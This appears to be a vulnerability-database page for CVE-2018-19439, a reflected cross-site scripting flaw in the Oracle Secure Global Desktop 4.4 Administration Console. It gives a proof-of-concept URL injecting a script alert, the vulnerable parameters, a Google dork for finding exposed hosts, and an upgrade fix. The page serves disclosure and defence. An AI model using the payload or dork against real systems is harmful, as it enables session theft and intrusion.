Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtRafael Pedrero1337DAY-ID-31677
HistoryNov 26, 2018 - 12:00 a.m.

Oracle Secure Global Desktop Administration Console 4.4 Cross Site Scripting Vulnerability

2018-11-2600:00:00
Rafael Pedrero
0day.today
23

EPSS

0.003

Percentile

67.9%

JSON

Oracle Secure Global Desktop Administration Console version 4.4 build 20080807152602 suffers from cross site scripting vulnerabilities.

<!--
# Exploit Title: Cross Site Scripting in Oracle Secure Global Desktop
Administration Console - 4.4; Build: 20080807152602
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.oracle.com/
# Software Link: http://www.oracle.com/
# Version: Oracle Secure Global Desktop Administration Console - 4.4;
Build: 20080807152602
# Tested on: all
# CVE : CVE-2018-19439
# Category: webapps

1. Description

Cross Site Scripting exists in the Administration Console in Oracle Secure
Global Desktop 4.4 20080807152602. The page "helpwindow.jsp" has reflected
XSS via all parameters.


2. Proof of Concept

http://X.X.X.X/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelp
Window></TITLE></HEAD><body><script>alert("XSS")</script><!--&
> helpFile=concepts.html&pageTitle=Administrator
Help&mastheadUrl=/images/productNameSecondaryMasthead.png&mastheadDescription=Sun
Secure Global Desktop
Administration&jspPath=/sgdadmin/faces/com_sun_web_ui/help/&mastheadHeight=40&mastheadWidth=20

Vulnerables parameters:
windowTitle, helpFile, pageTitle, mastheadUrl, mastheadDescription,
jspPath, mastheadHeight and mastheadWidth.

Google dorks:
inurl:"/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"


3. Solution:

Update to the latests version Oracle Secure Global Desktop Administration
Console 5.4.

-->

#  0day.today [2019-01-21]  #

Related

prion 1
nvd 1
packetstorm 1
cvelist 1
nuclei 1
cve 1
prion
prion
Cross site scripting
2018-12-13 19:29:00
nvd
nvd
CVE-2018-19439
2018-12-13 19:29:00
packetstorm
packetstorm
Oracle Secure Global Desktop Administration Console 4.4 Cross Site Scripting
2018-11-22 00:00:00
cvelist
cvelist
CVE-2018-19439
2018-12-13 19:00:00
nuclei
nuclei
Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting
2020-06-22 13:35:37
cve
cve
CVE-2018-19439
2018-12-13 19:29:00

EPSS

0.003

Percentile

67.9%

JSON
Related for 1337DAY-ID-31677
prion1nvd1packetstorm1cvelist1nuclei1cve1